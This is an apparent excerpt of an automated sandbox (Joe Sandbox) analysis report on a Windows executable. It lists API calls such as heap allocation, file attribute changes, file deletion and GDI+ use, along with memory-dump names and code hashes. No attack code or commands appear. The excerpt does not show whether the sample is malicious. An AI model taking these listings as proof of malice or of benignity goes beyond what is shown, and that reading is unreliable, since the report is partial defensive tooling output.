                                                                                          • RtlReAllocateHeap.NTDLL(00000000,?,00200000,?,?,003FCBE8,003C17A1,?,?,?,?,00000000,?,003C1378,?,?), ref: 003E5B47
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap$_free
                                                                                          • String ID:
                                                                                          • API String ID: 1482568997-0
                                                                                          • Opcode ID: 72f9a9ddc420a988c8d0370a61886c9747ffb79d161556a312419d8c53579ee2
                                                                                          • Instruction ID: f3384258d43108851adf773b69f9c25ccc79f7a747e39936992776d434ada953
                                                                                          • Opcode Fuzzy Hash: 72f9a9ddc420a988c8d0370a61886c9747ffb79d161556a312419d8c53579ee2
                                                                                          • Instruction Fuzzy Hash: 5BF06232711AB6A6DB332A279C01FAB375C9FD1778F164315F819AA5E2EB70980081F1
                                                                                          APIs
                                                                                          • LoadStringW.USER32(?,?,00000200,?), ref: 003CD187
                                                                                          • LoadStringW.USER32(?,?,00000200,?), ref: 003CD19D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: LoadString
                                                                                          • String ID:
                                                                                          • API String ID: 2948472770-0
                                                                                          • Opcode ID: 4974e47c73b2135809d7d0458163f26889316ae462d2a367b400f897f16a6aaa
                                                                                          • Instruction ID: 38cd6b525bda2564eeb9bb1ccea8f1c7ba0b03b4c970d67f5005e7a93ec89ff7
                                                                                          • Opcode Fuzzy Hash: 4974e47c73b2135809d7d0458163f26889316ae462d2a367b400f897f16a6aaa
                                                                                          • Instruction Fuzzy Hash: EDF0CD7276122C6FEA139F10AC85FB77E5EEB05380F021839FA8AD6061D6224C01C7A0
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(?,?), ref: 003CFCB3
                                                                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 003CFCBA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$AffinityCurrentMask
                                                                                          • String ID:
                                                                                          • API String ID: 1231390398-0
                                                                                          • Opcode ID: 24cf7e25d38685d79b1687547e17844faa1088d00f918405aebae710978062b3
                                                                                          • Instruction ID: d043dfca14418fbed95b3a0523f7904fa68b63290a41a1feb14847afd7ee453d
                                                                                          • Opcode Fuzzy Hash: 24cf7e25d38685d79b1687547e17844faa1088d00f918405aebae710978062b3
                                                                                          • Instruction Fuzzy Hash: 16E0ED72F1010E6B8B1A86A89C05EFA729EEE44315B25817EED46D3600EA34DD5587A0
                                                                                          APIs
                                                                                          • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,003C9EF9,?,?,?,003C9D92,?,00000001,00000000,?,?), ref: 003CA0D7
                                                                                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,003C9EF9,?,?,?,003C9D92,?,00000001,00000000,?,?), ref: 003CA108
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 032afa99d5af076bba87ff7f2307b58e39a8d671d7bb446c6b495b75a979066a
                                                                                          • Instruction ID: e72c6cd7ab4f21448de4fca212d747bfc82472c417353449dc5778991ce2dc04
                                                                                          • Opcode Fuzzy Hash: 032afa99d5af076bba87ff7f2307b58e39a8d671d7bb446c6b495b75a979066a
                                                                                          • Instruction Fuzzy Hash: 92F0307125010EABDF125FA4EC01FEA776DAB04385F448065B988D6165DB329E98DB50
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemText_swprintf
                                                                                          • String ID:
                                                                                          • API String ID: 3011073432-0
                                                                                          • Opcode ID: 1b5ae64e649ecab58c3b06c114e678540ab193e0f68b41333b9cf90bc4007dda
                                                                                          • Instruction ID: 3d048550d5197178fedb7a30e988d422f800591883a176cdb9591cfc48ecab25
                                                                                          • Opcode Fuzzy Hash: 1b5ae64e649ecab58c3b06c114e678540ab193e0f68b41333b9cf90bc4007dda
                                                                                          • Instruction Fuzzy Hash: 6AF05C73564309B6EB13B7609D06F9A3B1DAB04341F04405BB605A61E2D6719E20D351
                                                                                          APIs
                                                                                          • DeleteFileW.KERNELBASE(?,?,?,003C9611,?,?,003C946C), ref: 003C9DBD
                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,003C9611,?,?,003C946C), ref: 003C9DEB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteFile
                                                                                          • String ID:
                                                                                          • API String ID: 4033686569-0
                                                                                          • Opcode ID: b8b66b7d1a722b8b38f2d423c09bf6bc37124056121bd10d99e22fe6292d1a5f
                                                                                          • Instruction ID: 3d080d4794125be644aa1dd0638bcd2395a1bc920d645d82f0f77aef7574226f
                                                                                          • Opcode Fuzzy Hash: b8b66b7d1a722b8b38f2d423c09bf6bc37124056121bd10d99e22fe6292d1a5f
                                                                                          • Instruction Fuzzy Hash: 96E0223164020E6BDB129F64DC0AFEA73ACEB08382F840066B988D6050DF318C90DA90
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,003C9E08,?,003C75A0,?,?,?,?), ref: 003C9E24
                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,003C9E08,?,003C75A0,?,?,?,?), ref: 003C9E50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 21a374d0093168d8ca37f65595c1f23ddaa4336b8c51043083e7dd0b716bcc63
                                                                                          • Instruction ID: 3cdc4ce292f6f6eb239c1a4832f983c55beaddbb9e1781d8fa98f425b56865d2
                                                                                          • Opcode Fuzzy Hash: 21a374d0093168d8ca37f65595c1f23ddaa4336b8c51043083e7dd0b716bcc63
                                                                                          • Instruction Fuzzy Hash: 73E09B7250015857CB12ABA8DC09FE9776CDB187E2F0101A5FD48E7291DB705D84C7D0
                                                                                          APIs
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003CF324
                                                                                          • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,003CDEC8,Crypt32.dll,?,003CDF4A,?,003CDF2E,?,?,?,?), ref: 003CF346
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: DirectoryLibraryLoadSystem
                                                                                          • String ID:
                                                                                          • API String ID: 1175261203-0
                                                                                          • Opcode ID: 6924f271ea8ec5249cce0e8242c66fe3333669eab1a7b3615081991a60e61f7a
                                                                                          • Instruction ID: a88335d8a58c38463fa329748ae6a6628315b2508dc48ce8b78b8eeb93f3a79f
                                                                                          • Opcode Fuzzy Hash: 6924f271ea8ec5249cce0e8242c66fe3333669eab1a7b3615081991a60e61f7a
                                                                                          • Instruction Fuzzy Hash: 19E012769111596BDB12AAA4DC05FEB7B6CEB09382F4440A6B948D2105DA74DD44CBB0
                                                                                          APIs
                                                                                          • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 003D8945
                                                                                          • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 003D894C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: BitmapCreateFromGdipStream
                                                                                          • String ID:
                                                                                          • API String ID: 1918208029-0
                                                                                          • Opcode ID: 70fd264944850add7f86858a6cf8694d365e7b1139bc6f10602e46668444fb3d
                                                                                          • Instruction ID: b3a12822bd098809faf9f2a59fe35fc6ce85da99c03925cb2794400fb2461753
                                                                                          • Opcode Fuzzy Hash: 70fd264944850add7f86858a6cf8694d365e7b1139bc6f10602e46668444fb3d
                                                                                          • Instruction Fuzzy Hash: 79E06576411208EFC711DF98D8017A9B7E8EB04311F10806BE88493700D7706E00DB91
                                                                                          APIs
                                                                                          • GdiplusShutdown.GDIPLUS(?,?,?,003EF79B,000000FF), ref: 003D90C7
                                                                                          • CoUninitialize.COMBASE(?,?,?,003EF79B,000000FF), ref: 003D90CC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: GdiplusShutdownUninitialize
                                                                                          • String ID:
                                                                                          • API String ID: 3856339756-0
                                                                                          • Opcode ID: 8c92756b159e8e814150a50d23b799e7adf2d33b8b4f9efa7f2f31b5aa06ebc4
                                                                                          • Instruction ID: 8ca96d960854be5e8f081653bee743f18a35e4f7e46c853ac7b2f6a0e9e285f1
                                                                                          • Opcode Fuzzy Hash: 8c92756b159e8e814150a50d23b799e7adf2d33b8b4f9efa7f2f31b5aa06ebc4
                                                                                          • Instruction Fuzzy Hash: D0E09A32504A409FC311DB4CDD05B41BBE9FB08B20F00876AB81A83BA0CB786800CA81
                                                                                          APIs
                                                                                            • Part of subcall function 003E1D9A: try_get_function.LIBVCRUNTIME ref: 003E1DAF
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003E0CC4
                                                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 003E0CCF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                          • String ID:
                                                                                          • API String ID: 806969131-0
                                                                                          • Opcode ID: 64a161343733c2a33f164a477a7b98c55dbf03b5a95333e6c40b8e8dfc431b9f
                                                                                          • Instruction ID: 2b98dba0c4224282569c77d5c57783070ff82452cb0ea90bdac06f4e5604c81c
                                                                                          • Opcode Fuzzy Hash: 64a161343733c2a33f164a477a7b98c55dbf03b5a95333e6c40b8e8dfc431b9f
                                                                                          • Instruction Fuzzy Hash: 1CD0A7755887B254590F237328124AB134864017707710746E0319D1C1EAE480C26516
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemShowWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3351165006-0
                                                                                          • Opcode ID: a7610f4979d3e5028677f43f7917d9e2d6742e9f52acdeb2e493c08e2c55f33d
                                                                                          • Instruction ID: dccfbde88bff98c72e505be29e60a1c23111f2418b21e7fc47685539f2b9ed3d
                                                                                          • Opcode Fuzzy Hash: a7610f4979d3e5028677f43f7917d9e2d6742e9f52acdeb2e493c08e2c55f33d
                                                                                          • Instruction Fuzzy Hash: 69C01272058500BFCB020F70DC09C3EBBAD9B95311F00C905B8A9C0060C238C410DB12
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(00401E74,?,?,?,?,003CA5A0,?,?,?,?,003EF79B,000000FF), ref: 003CFC42
                                                                                          • LeaveCriticalSection.KERNEL32(00401E74,?,?,?,?,003CA5A0,?,?,?,?,003EF79B,000000FF), ref: 003CFC99
                                                                                            • Part of subcall function 003CF9D1: ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 003CFA05
                                                                                            • Part of subcall function 003CF9D1: CloseHandle.KERNEL32(?,?), ref: 003CFA1F
                                                                                            • Part of subcall function 003CF9D1: DeleteCriticalSection.KERNEL32(?), ref: 003CFA38
                                                                                            • Part of subcall function 003CF9D1: CloseHandle.KERNELBASE(?), ref: 003CFA44
                                                                                            • Part of subcall function 003CF9D1: CloseHandle.KERNEL32(?), ref: 003CFA50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCriticalHandleSection$DeleteEnterLeaveReleaseSemaphore
                                                                                          • String ID:
                                                                                          • API String ID: 3265325312-0
                                                                                          • Opcode ID: e9dac9650bc0b3cb3cf98c6da6dfc354c01c20f324ec67677b3064278fb7c430
                                                                                          • Instruction ID: 4684059537a05b54e6187c8cc26627c3d843d8e459b077c38c1da172cf75320e
                                                                                          • Opcode Fuzzy Hash: e9dac9650bc0b3cb3cf98c6da6dfc354c01c20f324ec67677b3064278fb7c430
                                                                                          • Instruction Fuzzy Hash: 76F081332042155FD6136724EC80E7EB71EDA85754326813EFC04A7252DB35AC0183A4
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: 30d2c9e06a70e7bf96a27d5a6fc5e037913c1de750669ae82518298921391199
                                                                                          • Instruction ID: 5bea72dd1f8c6b7cc56f21e030c0b765ec047d156b6f2a19728f0efe58fd29b9
                                                                                          • Opcode Fuzzy Hash: 30d2c9e06a70e7bf96a27d5a6fc5e037913c1de750669ae82518298921391199
                                                                                          • Instruction Fuzzy Hash: D3B1C370A04646AEEB2ACF78C484FF9FBA5BF06304F15425EE455D7282CB31AC64DB91
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003C8210
                                                                                            • Part of subcall function 003C137E: __EH_prolog.LIBCMT ref: 003C1383
                                                                                            • Part of subcall function 003C137E: new.LIBCMT ref: 003C13FB
                                                                                            • Part of subcall function 003C19B1: __EH_prolog.LIBCMT ref: 003C19B6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: 3462bfd6da3b75928c917c09da70ad3510b4a74cf4d13e003e01b73e3e1a49ad
